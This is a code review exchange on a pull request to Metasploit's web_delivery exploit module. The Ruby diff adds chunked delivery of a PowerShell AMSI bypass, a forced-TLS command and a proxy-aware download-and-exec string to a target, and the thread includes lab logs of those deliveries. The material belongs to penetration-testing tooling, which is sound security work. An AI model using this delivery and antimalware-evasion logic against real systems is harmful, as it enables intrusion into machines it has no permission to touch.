modules/exploits/multi/script/web_delivery.rb

```diff
@@ -222,9 +238,27 @@ def on_request_uri(cli, request)
       return
     end
 
-    if request.raw_uri.to_s.ends_with?(amsi_bypass_uri)
-      data = bypass_powershell_protections
-      print_status("Delivering AMSI Bypass (#{data.length} bytes)")
+    if datastore['PSH-AmsiBypass'] && uri.ends_with?(*@amsi_uris)
+      if @amsi_bypass_chunks.blank?
+        @amsi_bypass_chunks = bypass_powershell_protections(datastore['PSH-AmsiBypassSplit'].to_i)
+      end
+      chunk_nb = uri.split('/').last
+      data = @amsi_bypass_chunks[chunk_nb.to_i - 1]
+      print_status("Delivering AMSI Bypass #{chunk_nb}/#{@amsi_bypass_chunks.size}(#{data.length} bytes)")
+      send_response(cli, data, 'Content-Type' => 'text/plain')
+      return
+    end
+
+    if ssl && datastore['PSH-ForceTLS12'] && uri.ends_with?(force_tls12_uri)
+      data = Rex::Powershell::PshMethods.force_tls12
+      print_status("Delivering ForceTLS12 command (#{data.length} bytes)")
+      send_response(cli, data, 'Content-Type' => 'text/plain')
+      return
+    end
+
+    if datastore['PSH-Proxy'] && uri.ends_with?(proxy_aware_uri)
+      data = Rex::Powershell::PshMethods.proxy_aware
```

Comment:
Hey @cdelafuente-r7, does this line need to be changed?
```suggestion
      data = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(uri)
```
I was seeing the exception below being thrown, not exactly sure if that is the correct fix although it seemed to solve the issue
```
[*] 172.16.199.138   web_delivery - Delivering ForceTLS12 command (78 bytes)
[-] 172.16.199.138   web_delivery - Exception handling request: undefined method `proxy_aware' for Rex::Powershell::PshMethods:Module
[*] 172.16.199.138   web_delivery - Delivering AMSI Bypass 1/5(249 bytes)
...
```

After the above fix the Proxy Aware command seemed to be delivered successfully:
```
[*] 172.16.199.138   web_delivery - Delivering ForceTLS12 command (78 bytes)
[*] 172.16.199.138   web_delivery - Delivering Proxy Aware command (276 bytes)
[*] 172.16.199.138   web_delivery - Delivering AMSI Bypass 1/5(310 bytes)
...
```

Everything else looks great 👍

Reply:
Absolutely, good catch! It is a left over of local changes I had made in the `rex-powershell` gem and I forgot to roll-back this one. Thanks!